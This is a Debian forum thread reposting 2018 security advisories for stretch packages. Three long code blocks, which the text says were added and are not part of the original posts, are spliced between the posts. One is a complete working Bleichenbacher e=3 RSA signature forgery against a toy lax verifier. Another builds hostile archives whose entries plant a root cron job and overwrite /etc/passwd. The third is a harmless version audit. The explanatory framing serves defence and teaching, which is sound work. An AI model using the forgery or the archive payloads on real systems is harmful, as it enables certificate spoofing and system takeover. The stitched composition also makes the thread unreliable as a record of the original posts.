

NEW UPDATES Debian

debian updates sunrat bruno v.t. eric layton

1498 replies to this topic

#1476 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 19 September 2018 - 06:45 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4297-1                   security@debian.org
https://www.debian.org/security/                          Michael Gilbert
September 19, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser

Two vulnerabilities have been discovered in the chromium web browser.
Kevin Cheung discovered an error in the WebAssembly implementation and
evil1m0 discovered a URL spoofing issue.

For the stable distribution (stretch), this problem has been fixed in
version 69.0.3497.92-1~deb9u1.
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.
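Every advisory in this thread ends with a "fixed in version" string, so the practical check on a stretch host is whether the installed version of each package sorts below that string under Debian's version ordering (epoch, then upstream, then revision; digit runs compare numerically, `~` sorts before everything including end of string, letters before other symbols). The block below is an added example, not part of sunrat's post and not Debian's own tooling: a Python reimplementation of dpkg's comparison rules, run over a constructed sample of `dpkg-query -W -f='${Package} ${Version}\n'` output against a table of the fixed versions quoted in this thread.

```python
"""Debian version comparison (dpkg verrevcmp rules) applied to the 'fixed in'
versions quoted in this thread. Added example; the reference implementation is
dpkg's own `dpkg --compare-versions`."""


def _order(c):
    """Weight of a character inside a non-digit run: '~' sorts before everything
    (even end-of-string, which weighs 0), letters before other symbols."""
    if c == "~":
        return -1
    if c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    return ord(c) + 256


def _verrevcmp(a, b):
    """Compare two upstream or revision strings the way dpkg does: alternate
    non-digit runs (ordered by _order) and digit runs (numeric, leading zeros
    ignored)."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            ac = _order(a[i]) if i < len(a) else 0
            bc = _order(b[j]) if j < len(b) else 0
            if ac != bc:
                return ac - bc
            i += 1
            j += 1
        while i < len(a) and a[i] == "0":
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        while i < len(a) and a[i].isdigit() and j < len(b) and b[j].isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def parse_version(v):
    """Split [epoch:]upstream[-revision]; the revision follows the LAST hyphen."""
    epoch = 0
    if ":" in v:
        e, v = v.split(":", 1)
        epoch = int(e)
    upstream, _, revision = v.rpartition("-") if "-" in v else (v, "", "")
    return epoch, upstream, revision


def compare_versions(a, b):
    """-1, 0 or 1, matching dpkg --compare-versions lt / eq / gt."""
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return 1 if ea > eb else -1
    for x, y in ((ua, ub), (ra, rb)):
        r = _verrevcmp(x, y)
        if r:
            return 1 if r > 0 else -1
    return 0


# Fixed versions for stretch as quoted in this thread (the later DSA where a
# package received two).
FIXED_STRETCH = {
    "strongswan": "5.5.1-4+deb9u4",          # DSA-4305-1 / DSA-4309-1
    "firefox-esr": "60.2.2esr-1~deb9u1",     # DSA-4304-1 / DSA-4310-1
    "git": "1:2.11.0-3+deb9u4",              # DSA-4311-1
    "tinc": "1.0.31-1+deb9u1",               # DSA-4312-1
    "libarchive-zip-perl": "1.59-1+deb9u1",  # DSA-4300-1
    "okular": "4:16.08.2-1+deb9u1",          # DSA-4303-1
    "wireshark": "2.6.3-1~deb9u1",           # DSA-4315-1
    "net-snmp": "5.7.3+dfsg-1.7+deb9u1",     # DSA-4314-1
}

# Constructed sample of `dpkg-query -W -f='${Package} ${Version}\n'` output.
SAMPLE_DPKG_OUTPUT = """\
strongswan 5.5.1-4+deb9u3
firefox-esr 60.2.2esr-1~deb9u1
git 1:2.11.0-3+deb9u4
tinc 1.0.31-1
libarchive-zip-perl 1.59-1
okular 4:16.08.2-1+deb9u1
bash 4.4-5
"""


def audit(dpkg_output, fixed=FIXED_STRETCH):
    """Return (package, installed, fixed) for each listed package whose installed
    version sorts below the advisory's fixed version."""
    findings = []
    for line in dpkg_output.splitlines():
        if not line.strip():
            continue
        pkg, installed = line.split(None, 1)
        if pkg in fixed and compare_versions(installed, fixed[pkg]) < 0:
            findings.append((pkg, installed, fixed[pkg]))
    return findings


if __name__ == "__main__":
    for pkg, have, want in audit(SAMPLE_DPKG_OUTPUT):
        print(f"{pkg}: installed {have} is older than fixed {want}")
```

On a real stretch host the same decision is `dpkg --compare-versions "$(dpkg-query -W -f='${Version}' strongswan)" lt 5.5.1-4+deb9u4`. Note that advisories name source packages, so map them to the binary package names you actually have installed first (the kernel, for instance, ships as linux-image-* packages).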

#1477 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 21 September 2018 - 07:54 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4298-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 20, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : hylafax
CVE ID         : CVE-2018-17141

Luis Merino, Markus Vervier and Eric Sesterhenn discovered that missing
input sanitising in the Hylafax fax software could potentially result in
the execution of arbitrary code via a malformed fax message.

For the stable distribution (stretch), this problem has been fixed in
version 3:6.0.6-7+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4299-1                   security@debian.org
https://www.debian.org/security/                        Yves-Alexis Perez
September 21, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : texlive-bin
CVE            : not yet available

Nick Roessler from the University of Pennsylvania has found a buffer overflow
in texlive-bin, the executables for TeX Live, the popular distribution of the TeX
document production system.

This buffer overflow can be used for arbitrary code execution by crafting a
special type1 font (.pfb) and providing it to users running pdf(la)tex, dvips or
luatex in a way that the font is loaded.

For the stable distribution (stretch), this problem has been fixed in
version 2016.20160513.41080.dfsg-2+deb9u1.

#1478 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 22 September 2018 - 08:03 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4300-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
September 22, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : libarchive-zip-perl
CVE ID         : CVE-2018-10860
Debian Bug     : 902882

It was discovered that Archive::Zip, a perl module for manipulation of
ZIP archives, is prone to a directory traversal vulnerability. An
attacker able to provide a specially crafted archive for processing can
take advantage of this flaw to overwrite arbitrary files during archive
extraction.

For the stable distribution (stretch), this problem has been fixed in
version 1.59-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4301-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 22, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mediawiki
CVE ID         : CVE-2018-0503 CVE-2018-0504 CVE-2018-0505

Multiple security vulnerabilities have been discovered in MediaWiki, a
website engine for collaborative work, which result in incorrectly
configured rate limits, information disclosure in Special:Redirect/logid
and bypass of an account lock.

For the stable distribution (stretch), these problems have been fixed in
version 1:1.27.5-1~deb9u1.

#1479 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 23 September 2018 - 07:04 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4302-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
September 23, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openafs
CVE ID         : CVE-2018-16947 CVE-2018-16948 CVE-2018-16949
Debian Bug     : 908616

Several vulnerabilities were discovered in openafs, an implementation of
the distributed filesystem AFS. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2018-16947

    Jeffrey Altman reported that the backup tape controller (butc)
    process does accept incoming RPCs but does not require (or allow
    for) authentication of those RPCs, allowing an unauthenticated
    attacker to perform volume operations with administrator
    credentials.

    https://openafs.org/...SA-2018-001.txt

CVE-2018-16948

    Mark Vitale reported that several RPC server routines do not fully
    initialize output variables, leaking memory contents (from both
    the stack and the heap) to the remote caller for
    otherwise-successful RPCs.

    https://openafs.org/...SA-2018-002.txt

CVE-2018-16949

    Mark Vitale reported that an unauthenticated attacker can consume
    large amounts of server memory and network bandwidth via
    specially crafted requests, resulting in denial of service to
    legitimate clients.

    https://openafs.org/...SA-2018-003.txt

For the stable distribution (stretch), these problems have been fixed in
version 1.6.20-2+deb9u2.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4303-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 23, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : okular
CVE ID         : CVE-2018-1000801

Joran Herve discovered that the Okular document viewer was susceptible
to directory traversal via malformed .okular files (annotated document
archives), which could result in the creation of arbitrary files.

For the stable distribution (stretch), this problem has been fixed in
version 4:16.08.2-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4304-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 23, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-12383 CVE-2018-12385

Two security issues have been found in the Mozilla Firefox web browser,
which could potentially result in the execution of arbitrary code and
local information disclosure.

For the stable distribution (stretch), these problems have been fixed in
version 60.2.1esr-1~deb9u1.
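DSA-4300-1 (Archive::Zip) and DSA-4303-1 (Okular's .okular archives) are the same bug class: an extractor joins the destination directory with an entry name taken from the archive and never checks where the result lands, so `../` components or absolute names write outside the target tree. The block below is an added example for both advisories and is not code from either project: it builds constructed archives in memory, flags the entry names a naive extractor would let escape, and shows the check that refuses them after resolving the real target path.

```python
"""Detecting and refusing Zip Slip entries. Added example for the DSA-4300-1
(Archive::Zip) and DSA-4303-1 (Okular archive) bug class; not code from either
project. Python's own ZipFile.extract() sanitises names, so we read the raw
names from infolist() to show what a naive extractor would see."""
import io
import os
import stat
import zipfile


def build_zip(entries):
    """Build an in-memory archive from {name: bytes}. Names are stored verbatim,
    so hostile paths survive (a normal zip client would not write them).
    Constructed test data only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    buf.seek(0)
    return zipfile.ZipFile(buf)


def unsafe_entries(zf):
    """Names that join(dest, name) would let escape dest: absolute paths, '..'
    components, drive-letter prefixes, and symlink entries that could redirect
    a later write in the same archive."""
    flagged = []
    for info in zf.infolist():
        name = info.filename
        parts = name.replace("\\", "/").split("/")
        mode = info.external_attr >> 16          # Unix mode bits, if the creator set them
        if (
            name.startswith(("/", "\\"))
            or ".." in parts
            or (len(parts[0]) == 2 and parts[0][1] == ":")   # C: style prefix
            or stat.S_ISLNK(mode)
        ):
            flagged.append(name)
    return flagged


def plan_extraction(zf, dest):
    """Resolve every target path and refuse the whole archive if any lands
    outside dest. Returns the resolved paths that would be written."""
    dest = os.path.realpath(dest)
    targets = []
    for info in zf.infolist():
        target = os.path.realpath(os.path.join(dest, info.filename))
        if os.path.commonpath([dest, target]) != dest:
            raise ValueError(f"refusing {info.filename!r}: resolves to {target}")
        targets.append(target)
    return targets


def is_safe_archive(zf, dest):
    try:
        plan_extraction(zf, dest)
        return True
    except ValueError:
        return False


# Constructed archives: one carrying traversal and absolute entries, one clean.
HOSTILE = build_zip({
    "docs/readme.txt": b"harmless",
    "../../../etc/cron.d/evil": b"* * * * * root /tmp/x\n",
    "/etc/passwd": b"root::0:0::/:/bin/sh\n",
})
CLEAN = build_zip({"docs/readme.txt": b"harmless", "docs/a/b.txt": b"x"})

if __name__ == "__main__":
    print("hostile entries:", unsafe_entries(HOSTILE))
    print("hostile archive safe?", is_safe_archive(HOSTILE, "/tmp/extract-demo"))
    print("clean archive safe?", is_safe_archive(CLEAN, "/tmp/extract-demo"))
```

Rejecting the whole archive rather than skipping the bad entry is deliberate: an archive that contains one traversal entry is hostile, and partial extraction only hides that from the caller.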

#1480 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 26 September 2018 - 08:28 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4305-1                   security@debian.org
https://www.debian.org/security/                        Yves-Alexis Perez
September 24, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : strongswan
CVE ID         : CVE-2018-16151 CVE-2018-16152

Sze Yiu Chau and his team from Purdue University and The University of Iowa
found several issues in the gmp plugin for strongSwan, an IKE/IPsec suite.

Problems in the parsing and verification of RSA signatures could lead to a
Bleichenbacher-style low-exponent signature forgery in certificates and during
IKE authentication.

While the gmp plugin doesn't allow arbitrary data after the ASN.1 structure
(the original Bleichenbacher attack), the ASN.1 parser is not strict enough and
allows data in specific fields inside the ASN.1 structure.

Only installations using the gmp plugin are affected (on Debian the OpenSSL plugin
has priority over the GMP one for RSA operations), and only when using keys and
certificates (including ones from CAs) with an exponent e = 3, which is usually
rare in practice.

CVE-2018-16151

    The OID parser in the ASN.1 code in gmp allows any number of random bytes
    after a valid OID.

CVE-2018-16152

    The algorithmIdentifier parser in the ASN.1 code in gmp doesn't enforce a
    NULL value for the optional parameter which is not used with any PKCS#1
    algorithm.

For the stable distribution (stretch), these problems have been fixed in
version 5.5.1-4+deb9u3.
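The advisory above says the gmp plugin rejects bytes after the DigestInfo but lets the attacker put bytes inside it (after the OID for CVE-2018-16151, in the AlgorithmIdentifier parameters for CVE-2018-16152). With e = 3 that is enough: the forger needs an s whose cube has an exact prefix (padding and DER headers) and an exact suffix (the hash's OCTET STRING) but arbitrary bytes in between, and because cubing permutes the odd residues modulo 2^k, the suffix can be pinned with a modular cube root while the prefix is hit with an ordinary integer cube root. The block below is an added example written for this thread, not strongSwan code: a toy verifier with the CVE-2018-16152 laxness beside a strict one, a constructed 2048-bit stand-in modulus (any odd n works, since only (n, e) are used and the forged cube never exceeds n), and the forgery itself, which for simplicity requires the hash to end in an odd byte (the attacker chooses the message, so it is nudged until it does).

```python
"""Bleichenbacher-style e=3 forgery against a lax PKCS#1 v1.5 verifier.
Added example for DSA-4305-1; the verifiers are toys written for this thread,
not strongSwan's gmp plugin. The lax parser skips AlgorithmIdentifier.parameters
without requiring NULL (the CVE-2018-16152 shape); filler after the OID
(CVE-2018-16151) would serve the same purpose. The middle-of-structure forgery
uses the modular cube-root trick of Kuehn, Pyshkin, Tews and Weinmann (2008)."""
import hashlib
import hmac

E = 3
K = 256                      # modulus size in bytes (2048-bit key)
SHA256_OID = bytes.fromhex("0609608648016503040201")
# Constructed stand-in for an e=3 modulus: verification uses only (n, e), and the
# forged s satisfies s**3 < n, so any odd 2048-bit integer exercises the parser.
N = (1 << 2047) | int.from_bytes(hashlib.sha256(b"constructed n").digest() * 8, "big") | 1


def der(tag, body):
    """Minimal DER TLV encoder with definite lengths."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def read_der(buf):
    """Decode one TLV; returns (tag, body, rest)."""
    if len(buf) < 2:
        raise ValueError("truncated")
    tag, n, hdr = buf[0], buf[1], 2
    if n & 0x80:
        nb = n & 0x7F
        n = int.from_bytes(buf[2:2 + nb], "big")
        hdr += nb
    if hdr + n > len(buf):
        raise ValueError("truncated")
    return tag, buf[hdr:hdr + n], buf[hdr + n:]


def digest_info(h, params=b"\x05\x00"):
    """DigestInfo ::= SEQUENCE { SEQUENCE { OID, params }, OCTET STRING hash }."""
    return der(0x30, der(0x30, SHA256_OID + params) + der(0x04, h))


def _em(sig):
    return pow(int.from_bytes(sig, "big"), E, N).to_bytes(K, "big")


def strict_verify(sig, msg):
    """Correct check: rebuild the full encoded message and compare byte for byte."""
    t = digest_info(hashlib.sha256(msg).digest())
    expected = b"\x00\x01" + b"\xff" * (K - 3 - len(t)) + b"\x00" + t
    return hmac.compare_digest(_em(sig), expected)


def lax_verify(sig, msg):
    """Parsing verifier: rejects trailing data after the DigestInfo (as the gmp
    plugin does) but, like the flawed code, accepts any parameters element."""
    em = _em(sig)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= K or em[i] != 0x00:
        return False
    try:
        tag, di, rest = read_der(em[i + 1:])
        if tag != 0x30 or rest:
            return False
        tag, algid, rest = read_der(di)
        if tag != 0x30 or not algid.startswith(SHA256_OID):
            return False
        _tag, _params, extra = read_der(algid[len(SHA256_OID):])   # the bug: any TLV accepted
        if extra:
            return False
        tag, digest, rest = read_der(rest)
        if tag != 0x04 or rest:
            return False
    except ValueError:
        return False
    return hmac.compare_digest(digest, hashlib.sha256(msg).digest())


def icbrt_ceil(x):
    """Smallest s with s**3 >= x, exact for big integers."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg, pad_len=8):
    """Find s with s**3 == P || G || S: P = everything up to the bogus parameters
    OCTET STRING (fixed), G = filler nobody checks, S = the real hash OCTET STRING
    (fixed, and odd so that the modular cube root exists)."""
    h = hashlib.sha256(msg).digest()
    if h[-1] % 2 == 0:
        raise ValueError("this simplified forgery needs an odd final hash byte")
    for g in range(K):                      # filler length that makes EM exactly K bytes
        em = b"\x00\x01" + b"\xff" * pad_len + b"\x00" + digest_info(h, der(0x04, b"\x00" * g))
        if len(em) == K:
            break
    else:
        raise ValueError("no layout fits")
    tail = 2 + len(h)                       # der(0x04, h)
    bits = 8 * tail
    suffix = int.from_bytes(em[-tail:], "big")
    prefix = int.from_bytes(em[:K - tail - g], "big")
    lo_bound = prefix << (8 * (g + tail))
    hi_bound = ((prefix + 1) << (8 * (g + tail))) - 1
    # x -> x**3 permutes the odd residues mod 2**bits; invert it with 3**-1 mod 2**(bits-1).
    s_low = pow(suffix, pow(3, -1, 1 << (bits - 1)), 1 << bits)
    s_min = icbrt_ceil(lo_bound)
    u = max(0, -(-(s_min - s_low) // (1 << bits)))   # ceil((s_min - s_low) / 2**bits)
    s = s_low + (u << bits)
    assert lo_bound <= s ** 3 <= hi_bound < N        # exact prefix, exact suffix, no reduction mod N
    return s.to_bytes(K, "big")


def odd_hash_message(base):
    """The attacker picks the message, so nudge it until SHA-256 ends in an odd byte."""
    for i in range(1000):
        m = base + b" #%d" % i
        if hashlib.sha256(m).digest()[-1] % 2:
            return m
    raise RuntimeError("unreachable in practice")


def demo():
    """Returns (lax accepts forgery, strict accepts forgery)."""
    msg = odd_hash_message(b"CN=attacker, forged under e=3")
    sig = forge(msg)
    return lax_verify(sig, msg), strict_verify(sig, msg)


if __name__ == "__main__":
    print("(lax, strict) accept forgery:", demo())   # (True, False)
```

The strict verifier never parses at all; it re-encodes what a valid signature must decrypt to and compares the whole block, which is the shape of check the advisory's fix moves towards. The forgery needs no private key and works against any e = 3 public key, which is why the advisory stresses that only e = 3 keys and certificates are affected.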

#1481 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 27 September 2018 - 07:04 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4306-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 27, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : python2.7
CVE ID         : CVE-2018-1060 CVE-2018-1061 CVE-2018-14647
                 CVE-2018-1000802

Multiple security issues were discovered in Python: ElementTree failed
to initialise Expat's hash salt, two denial of service issues were found
in difflib and poplib and the shutil module was affected by a command
injection vulnerability.

For the stable distribution (stretch), these problems have been fixed in
version 2.7.13-2+deb9u3.

#1482 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 28 September 2018 - 07:08 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4307-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
September 28, 2018                    https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : python3.5
CVE ID         : CVE-2017-1000158 CVE-2018-1060 CVE-2018-1061
                 CVE-2018-14647

Multiple security issues were discovered in Python: ElementTree failed
to initialise Expat's hash salt, two denial of service issues were found
in difflib and poplib and a buffer overflow in PyString_DecodeEscape.

For the stable distribution (stretch), these problems have been fixed in
version 3.5.3-1+deb9u1.

#1483 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 01 October 2018 - 08:38 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4308-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 01, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : linux
CVE ID         : CVE-2018-6554 CVE-2018-6555 CVE-2018-7755 CVE-2018-9363
                 CVE-2018-9516 CVE-2018-10902 CVE-2018-10938 CVE-2018-13099
                 CVE-2018-14609 CVE-2018-14617 CVE-2018-14633 CVE-2018-14678
                 CVE-2018-14734 CVE-2018-15572 CVE-2018-15594 CVE-2018-16276
                 CVE-2018-16658 CVE-2018-17182

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a privilege escalation, denial of service or information
leaks.

CVE-2018-6554

    A memory leak in the irda_bind function in the irda subsystem was
    discovered. A local user can take advantage of this flaw to cause a
    denial of service (memory consumption).

CVE-2018-6555

    A flaw was discovered in the irda_setsockopt function in the irda
    subsystem, allowing a local user to cause a denial of service
    (use-after-free and system crash).

CVE-2018-7755

    Brian Belleville discovered a flaw in the fd_locked_ioctl function
    in the floppy driver in the Linux kernel. The floppy driver copies a
    kernel pointer to user memory in response to the FDGETPRM ioctl. A
    local user with access to a floppy drive device can take advantage
    of this flaw to discover the location of kernel code and data.

CVE-2018-9363

    It was discovered that the Bluetooth HIDP implementation did not
    correctly check the length of received report messages. A paired
    HIDP device could use this to cause a buffer overflow, leading to
    denial of service (memory corruption or crash) or potentially
    remote code execution.

CVE-2018-9516

    It was discovered that the HID events interface in debugfs did not
    correctly limit the length of copies to user buffers.  A local
    user with access to these files could use this to cause a
    denial of service (memory corruption or crash) or possibly for
    privilege escalation.  However, by default debugfs is only
    accessible by the root user.

CVE-2018-10902

    It was discovered that the rawmidi kernel driver does not protect
    against concurrent access which leads to a double-realloc (double
    free) flaw. A local attacker can take advantage of this issue for
    privilege escalation.

CVE-2018-10938

    Yves Younan from Cisco reported that the Cipso IPv4 module did not
    correctly check the length of IPv4 options. On custom kernels with
    CONFIG_NETLABEL enabled, a remote attacker could use this to cause
    a denial of service (hang).

CVE-2018-13099

    Wen Xu from SSLab at Gatech reported a use-after-free bug in the
    F2FS implementation. An attacker able to mount a crafted F2FS
    volume could use this to cause a denial of service (crash or
    memory corruption) or possibly for privilege escalation.

CVE-2018-14609

    Wen Xu from SSLab at Gatech reported a potential null pointer
    dereference in the F2FS implementation. An attacker able to mount
    a crafted F2FS volume could use this to cause a denial of service
    (crash).

CVE-2018-14617

    Wen Xu from SSLab at Gatech reported a potential null pointer
    dereference in the HFS+ implementation. An attacker able to mount
    a crafted HFS+ volume could use this to cause a denial of service
    (crash).

CVE-2018-14633

    Vincent Pelletier discovered a stack-based buffer overflow flaw in
    the chap_server_compute_md5() function in the iSCSI target code. An
    unauthenticated remote attacker can take advantage of this flaw to
    cause a denial of service or possibly to get a non-authorized access
    to data exported by an iSCSI target.

CVE-2018-14678

    M. Vefa Bicakci and Andy Lutomirski discovered a flaw in the
    kernel exit code used on amd64 systems running as Xen PV guests.
    A local user could use this to cause a denial of service (crash).

CVE-2018-14734

    A use-after-free bug was discovered in the InfiniBand
    communication manager. A local user could use this to cause a
    denial of service (crash or memory corruption) or possibly for
    privilege escalation.

CVE-2018-15572

    Esmaiel Mohammadian Koruyeh, Khaled Khasawneh, Chengyu Song, and
    Nael Abu-Ghazaleh, from University of California, Riverside,
    reported a variant of Spectre variant 2, dubbed SpectreRSB. A
    local user may be able to use this to read sensitive information
    from processes owned by other users.

CVE-2018-15594

    Nadav Amit reported that some indirect function calls used in
    paravirtualised guests were vulnerable to Spectre variant 2.  A
    local user may be able to use this to read sensitive information
    from the kernel.

CVE-2018-16276

    Jann Horn discovered that the yurex driver did not correctly limit
    the length of copies to user buffers.  A local user with access to
    a yurex device node could use this to cause a denial of service
    (memory corruption or crash) or possibly for privilege escalation.

CVE-2018-16658

    It was discovered that the cdrom driver does not correctly
    validate the parameter to the CDROM_DRIVE_STATUS ioctl.  A user
    with access to a cdrom device could use this to read sensitive
    information from the kernel or to cause a denial of service
    (crash).

CVE-2018-17182

    Jann Horn discovered that the vmacache_flush_all function mishandles
    sequence number overflows. A local user can take advantage of this
    flaw to trigger a use-after-free, causing a denial of service
    (crash or memory corruption) or privilege escalation.

For the stable distribution (stretch), these problems have been fixed in
version 4.9.110-3+deb9u5.

#1484 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 03 October 2018 - 07:12 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4309-1                   security@debian.org
https://www.debian.org/security/                        Yves-Alexis Perez
October 01, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : strongswan
CVE ID         : CVE-2018-17540

Google's OSS-Fuzz revealed an exploitable bug in the gmp plugin caused by the
patch that fixes CVE-2018-16151 and CVE-2018-16152 (DSA-4305-1).

An attacker could trigger it using crafted certificates with RSA keys with
very small moduli. Verifying signatures with such keys would cause an integer
underflow and subsequent heap buffer overflow resulting in a crash of the
daemon. While arbitrary code execution is not completely ruled out because of
the heap buffer overflow, due to the form of the data written to the buffer
it seems difficult to actually exploit it in such a way.

For the stable distribution (stretch), this problem has been fixed in
version 5.5.1-4+deb9u4.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4310-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 03, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-12386 CVE-2018-12387

Two security issues have been found in the Mozilla Firefox web browser,
which could potentially result in the execution of arbitrary code inside
the sandboxed content process.

For the stable distribution (stretch), these problems have been fixed in
version 60.2.2esr-1~deb9u1.

#1485 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 06 October 2018 - 06:45 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4311-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 05, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : git
CVE ID         : CVE-2018-17456

joernchen of Phenoelit discovered that git, a fast, scalable,
distributed revision control system, is prone to an arbitrary code
execution vulnerability via a specially crafted .gitmodules file in a
project cloned with --recurse-submodules.

For the stable distribution (stretch), this problem has been fixed in
version 1:2.11.0-3+deb9u4.

#1486 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 08 October 2018 - 07:00 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4312-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 08, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : tinc
CVE ID         : CVE-2018-16738 CVE-2018-16758

Several vulnerabilities were discovered in tinc, a Virtual Private
Network (VPN) daemon. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2018-16738

    Michael Yonli discovered a flaw in the implementation of the
    authentication protocol that could allow a remote attacker to
    establish an authenticated, one-way connection with another node.

CVE-2018-16758

    Michael Yonli discovered that a man-in-the-middle that has
    intercepted a TCP connection might be able to disable encryption of
    UDP packets sent by a node.

For the stable distribution (stretch), these problems have been fixed in
version 1.0.31-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4313-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 08, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : linux
CVE ID         : CVE-2018-15471 CVE-2018-18021

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a privilege escalation, denial of service or information
leaks.

CVE-2018-15471 (XSA-270)

    Felix Wilhelm of Google Project Zero discovered a flaw in the hash
    handling of the xen-netback Linux kernel module. A malicious or
    buggy frontend may cause the (usually privileged) backend to make
    out of bounds memory accesses, potentially resulting in privilege
    escalation, denial of service, or information leaks.

    https://xenbits.xen....visory-270.html

CVE-2018-18021

    It was discovered that the KVM subsystem on the arm64 platform does
    not properly handle the KVM_SET_ONE_REG ioctl. An attacker who can
    create KVM based virtual machines can take advantage of this flaw
    for denial of service (hypervisor panic) or privilege escalation
    (arbitrarily redirect the hypervisor flow of control with full
    register control).

For the stable distribution (stretch), these problems have been fixed in
version 4.9.110-3+deb9u6.

#1487 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 11 October 2018 - 06:11 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4314-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 11, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : net-snmp
CVE ID         : CVE-2018-18065
Debian Bug     : 910638

Magnus Klaaborg Stubman discovered a NULL pointer dereference bug in
net-snmp, a suite of Simple Network Management Protocol applications,
allowing a remote, authenticated attacker to crash the snmpd process
(causing a denial of service).

For the stable distribution (stretch), this problem has been fixed in
version 5.7.3+dfsg-1.7+deb9u1.

#1488 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 18 October 2018 - 07:58 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4315-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 12, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : wireshark
